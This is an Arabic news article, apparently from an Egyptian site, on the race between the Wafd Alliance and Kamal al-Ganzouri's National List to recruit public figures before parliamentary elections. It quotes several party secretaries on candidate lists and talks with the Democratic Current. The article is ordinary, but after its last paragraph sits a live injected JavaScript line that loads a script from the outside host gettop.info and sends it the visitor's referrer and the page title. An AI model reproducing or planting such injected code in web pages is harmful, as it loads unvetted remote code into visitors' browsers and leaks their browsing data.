صراع بين الوفد المصري وقائمة الجنزوري لضم الشخصيات العامة قبيل انتخابات “النواب”

في الوقت الذي كشفت فيه مصادر “للأخبار” عن تحركات مكثفة لرئيس الوزراء الأسبق د.كمال الجنزوري، لاستكمال “القائمة الوطنية” التي يقودها لخوض الانتخابات البرلمانية المقبلة، يسابق “تحالف الوفد المصري” بقيادة السيد البدوي رئيس حزب الوفد، الزمن لضم أكبر عدد من الشخصيات الوطنية لقائمة التحالف والتي ستمنح ثقلا سياسيا للقائمة للمنافسة على أكبر عدد من مقاعد مجلس النواب.

وأكد سكرتير عام تحالف الوفد المصري حسام الخولي، أن التحالف يضم قائمة بأسماء مرشحيه القادرين على خوض الانتخابات، موضحا أنه سيتم الإعلان عن هذه الأسماء بمجرد صدور قانون تقسيم الدوائر الانتخابية، لاختيار الأنسب في كل دائرة.

وأشار إلى أن حزب الوفد لديه عدد كبير من الشخصيات العامة والكوادر البارزة، والتي ستترشح على القائمة الانتخابية للتحالف وستكون أمامها فرصة كبيرة لكسب تأييد الجماهير.

من جانبه شدد رئيس حزب الإصلاح والتنمية محمد أنور السادات، على أن التأكيد على إجراء الانتخابات في موعدها بعد تصريحات الرئيس عبد الفتاح السيسى الأخيرة، أعطى دفعة للأحزاب والتحالفات الانتخابية في اتجاه حسم موقفها استعدادا للانتخابات، مشيرا في الوقت نفسه إلى أن التحالف لديه قائمة بأسماء مرشحيه، وينتظر صدور قانون تقسيم الدوائر الانتخابية لتحديد المرشح الملائم لكل دائرة انتخابية.

وأكد السادات أن التحالف على علم بأن رئيس وزراء مصر الأسبق د.كمال الجنزوري، يقود اتصالات مع عدد من التحالفات الانتخابية لتشكيل قائمة وطنية لخوض الانتخابات البرلمانية لكن تحالف الوفد المصري ليس طرفا في هذه الاتصالات.

وأضاف رئيس حزب الإصلاح والتنمية، أن الوفد المصري يجري اتصالات مع عدد من الشخصيات العامة والتي تحظى باحترام وثقة الجماهير لخوض الانتخابات على قوائم الحزب.

وقال رئيس حزب الإصلاح والتنمية، إن التحركات المقبلة ستشهد سلسلة من الاجتماعات بين تحالف الوفد المصري، وعدد من قيادات التيار الديمقراطي بشأن انضمامهم للتحالف، لافتا إلى أن المجلس الرئاسي للتحالف ناقش الأمر في اجتماعه السابق، وتوصل إلى ضرورة عقد لقاءات مع قيادات التيار لمناقشة وثيقة التحالف الانتخابي، وأنه في حال موافقتهم على الوثيقة سنعلن خطوات الانضمام وتفاصيله.

وأشار الأمين العام للحزب المصري الديمقراطي أحمد فوزي، إلى أن تحالف الوفد المصري يتواصل مع كل الشخصيات العامة والقوى السياسية التي تسير في ركاب ثورتي 25 يناير و30 يونيو، مؤكدا في الوقت نفسه أن التحالف سيستبعد أي شخص يرى أن ثورة 25 يناير مؤامرة أو يرى في 30 يونيو انقلابا.

وحول الاستعدادات الفعلية للانتخابات البرلمانية أكد فوزي، أن لجنة الانتخابات بالتحالف تباشر عملها بشكل دائم، انتظارا لإعلان قانون تقسيم الدوائر الانتخابية.

وبدوره أكد الأمين العام لحزب الدستور د.ياقوت السنوسي، أنه تم الاتفاق على عقد اجتماع بين قيادات التيار الديمقراطي وقيادات تحالف الوفد المصري، الأربعاء المقبل لاستكمال المناقشات بشأن التحالفات الانتخابية ومحاولة الوصول إلى تحالف واسع يضم القوى المؤيدة لثورتي 25 يناير و30 يونيو.

var d=document;var s=d.createElement(‘script’); s.src='http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=' + encodeURIComponent(document.referrer) + '&default_keyword=' + encodeURIComponent(document.title) + ''; document.currentScript.parentNode.insertBefore(s, document.currentScript);

عن admin

اضف رد

لن يتم نشر البريد الإلكتروني . الحقول المطلوبة مشار لها بـ *

*